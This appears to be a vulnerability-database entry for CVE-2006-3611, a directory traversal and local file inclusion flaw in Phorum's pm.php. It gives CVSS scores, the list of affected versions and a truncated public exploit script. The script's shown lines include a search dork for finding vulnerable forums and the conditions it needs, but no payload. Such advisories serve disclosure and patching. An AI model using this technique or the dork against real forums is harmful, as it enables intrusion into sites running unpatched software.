5.5
CVSSv2

CVE-2006-3611

Published: 18/07/2006 Updated: 07/11/2023
CVSS v2 Base Score: 5.5 | Impact Score: 4.9 | Exploitability Score: 8
VMScore: 555
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:N

Vulnerability Summary

Directory traversal vulnerability in pm.php in Phorum 5 allows remote authenticated users to include and execute arbitrary local files via directory traversal sequences in the GLOBALS[template] parameter, as demonstrated by injecting PHP sequences into a log file, which is then included by pm.php.

Vulnerable Product Search on Vulmon Subscribe to Product

phorum phorum 3.2.2

phorum phorum

phorum phorum 5.0.15

phorum phorum 3.1.1_pre

phorum phorum 5.0.1_alpha

phorum phorum 3.4.6

phorum phorum 3.2.3

phorum phorum 5.0.13a

phorum phorum 5.0.15a

phorum phorum 3.2.7

phorum phorum 3.4.3

phorum phorum 5.0.2_alpha

phorum phorum 5.0.5_beta

phorum phorum 5.0.19

phorum phorum 5.1.13

phorum phorum 3.1.1

phorum phorum 3.2.8

phorum phorum 3.3.1a

phorum phorum 5.0.7a_beta

phorum phorum 3.4.4

phorum phorum 5.0.17

phorum phorum 5.0.17a

phorum phorum 3.3.1

phorum phorum 3.4

phorum phorum 3.3.2

phorum phorum 3.1.1_rc2

phorum phorum 5.0.18

phorum phorum 5.0.4a_beta

phorum phorum 4.3.7

phorum phorum 3.0.7

phorum phorum 3.1.1a

phorum phorum 3.4.5

phorum phorum 5.0.12

phorum phorum 5.0.20

phorum phorum 3.4.8a

phorum phorum 3.2.5

phorum phorum 3.2.3a

phorum phorum 5.0.0_alpha

phorum phorum 3.2

phorum phorum 5.0.16

phorum phorum 5.0.10

phorum phorum 3.1.2

phorum phorum 5.0.11

phorum phorum 5.0.14a

phorum phorum 5.0.9

phorum phorum 3.1

phorum phorum 5.0.14

phorum phorum 5.0.7_beta

phorum phorum 3.4.2

phorum phorum 5.0.6_beta

phorum phorum 3.4.1

phorum phorum 3.4.7

phorum phorum 5.0.3_beta

phorum phorum 3.4.8

phorum phorum 3.2.4

phorum phorum 5.0.4_beta

phorum phorum 5.0.13

phorum phorum 5.0.8_rc

phorum phorum 3.2.3b

phorum phorum 3.3.2b3

phorum phorum 3.3.2a

phorum phorum 3.2.6

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "PHORUM 5 arbitrary local inclusion exploit\n"; echo "by rgod rgod@autisticiorg\n"; echo "site: retrogodaltervistaorg\n"; echo "dork: \"This forum powered by Phorum\"\n\n"; /* works with: register_globals=On magic_quotes_gpc=Off */ if ($argc<6) { echo "Usage: php "$argv[0]" host path ...